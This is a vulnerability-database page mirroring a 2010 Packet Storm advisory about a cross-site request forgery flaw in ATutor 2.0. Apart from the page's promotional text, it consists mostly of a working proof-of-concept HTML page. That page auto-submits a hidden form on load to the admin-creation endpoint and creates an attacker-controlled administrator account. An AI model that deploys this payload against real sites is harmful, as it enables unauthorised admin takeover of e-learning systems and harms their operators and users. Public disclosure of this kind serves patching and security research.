Lucene search
K

ATutor 2.0 Cross Site Request Forgery

🗓️ 06 Jul 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

ATutor 2.0 Cross Site Request Forgery vulnerability allows new admin creatio

Code
`<!------------------------------------------------------------------------  
# Software................ATutor 2.0   
# Vulnerability...........Cross-site Request Forgery  
# Download................http://www.atutor.ca/atutor/  
# Release Date............7/5/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in ATutor 2.0 can be  
# exploited to create a new admin (new_admin/Password1).  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit.click()">  
<form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">  
<input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />  
<input type="hidden" name="password_error" value="" />  
<input type="hidden" name="login" value="new_admin" />  
<input type="hidden" name="password" value="" />  
<input type="hidden" name="confirm_password" value="" />  
<input type="hidden" name="real_name" value="" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="priv_admin" value="1" />  
<input type="submit" name="submit" value="Save" />   
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
18